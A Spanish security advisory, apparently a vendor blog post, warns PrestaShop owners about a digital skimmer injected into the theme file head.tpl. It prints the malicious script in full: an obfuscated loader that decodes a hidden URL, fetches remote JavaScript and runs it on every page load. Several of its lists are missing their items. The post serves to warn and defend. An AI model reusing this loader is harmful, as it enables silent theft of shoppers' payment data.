Recientemente hemos identificado una amenaza de seguridad crítica que afecta al ecosistema PrestaShop. Te lo detallamos para que puedas entender el riesgo.
Recientemente hemos identificado una amenaza de seguridad crítica que afecta al ecosistema PrestaShop. Se trata de un malicious script (conocido como «digital skimmer») diseñado para interceptar y robar la información de pago de tus clientes de manera silenciosa.
Contenidos
Este malware no bloquea tu web, sino que actúa como un parásito en el proceso de pago. Su funcionamiento se basa en el engaño visual:
El código malicioso se inserta directamente en el archivo _partials/head.tpl del tema activo de la tienda. Esto indica que el atacante ha logrado modificar archivos internos del servidor. El fragmento de código detectado es el siguiente:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Este script utiliza la función atob para ocultar una URL maliciosa y descargar el código dañino en tiempo real cada vez que un usuario visita la tienda.
El impacto de este «skimming» digital es extremadamente grave:
Esta amenaza no depende de una versión específica de PrestaShop. Afecta a cualquier tienda (v1.7, v8.x, etc.) donde el atacante haya podido entrar debido a:
¿Necesitas ayuda para limpiar tu tienda o realizar una auditoría de seguridad? Contacta con nuestro equipo técnico de inmediato.
Hemos adaptado todos nuestros sistemas ERP para que sean compatibles con las nuevas obligaciones de…
Si quieres saber todo lo que incluye nuevo esta versión, te dejamos con un resumen…
Nuestro proyecto, que comenzó como una modesta andadura, ya comienza a obtener reconocimiento por parte…
Este mes de septiembre de 2024, este nuevo tipo de ataque para suplantar identidad está…
La Dolibarr Foundation ha liberado la versión estable número 18 de su ERP con muchas…
Si tu empresa necesita un ERP con módulo CRM y listo para trabajar en el…